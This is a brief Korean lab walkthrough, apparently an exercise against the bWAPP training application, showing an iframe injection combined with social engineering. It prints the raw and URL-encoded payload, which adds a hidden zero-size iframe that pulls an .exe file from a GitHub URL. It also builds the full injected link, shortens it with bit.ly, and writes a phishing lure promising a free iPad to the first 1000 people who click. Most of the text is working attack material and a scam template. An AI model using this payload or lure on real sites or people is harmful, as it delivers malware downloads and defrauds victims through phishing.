 4) 사회 공학적 기법을 이용한 iframe 인젝션 공격

 ① 

인젝션 코드

robots.txt" height="250" width="250"></iframe><iframe frameborder="0" src= https://github.com/ncs10322/security/raw/main/MsgBox.exe height="0" width="0">

URL 인코딩 인젝션 코드

robots.txt%22%20height%3D%22250%22%20width%3D%22250%22%3E%3C%2Fiframe%3E%3Ciframe%20frameborder%3D%220%22%20src%3D%20https%3A%2F%2Fgithub.com%2Fncs10322%2Fsecurity%2Fraw%2Fmain%2FMsgBox.exe%20height%3D%220%22%20width%3D%220%22%3E


 ② 

인젝션 위치

http://192.168.20.205/bWAPP/iframei.php?ParamUrl=인젝션 위치&ParamWidth=250&ParamHeight=250
인젝션 URL 코드

http://192.168.20.205/bWAPP/iframei.php?ParamUrl=robots.txt%22%20height%3D%22250%22%20width%3D%22250%22%3E%3C%2Fiframe%3E%3Ciframe%20frameborder%3D%220%22%20src%3D%20https%3A%2F%2Fgithub.com%2Fncs10322%2Fsecurity%2Fraw%2Fmain%2FMsgBox.exe%20height%3D%220%22%20width%3D%220%22%3E&ParamWidth=250&ParamHeight=250

 ③ 

https://bit.ly/43C8Nj6


 ④ 

제목 : 아이패드 무료 선착순 1000명 지급
본문 :

다음 링크를 클릭하여 신청하세요.

https://bit.ly/43C8Nj6










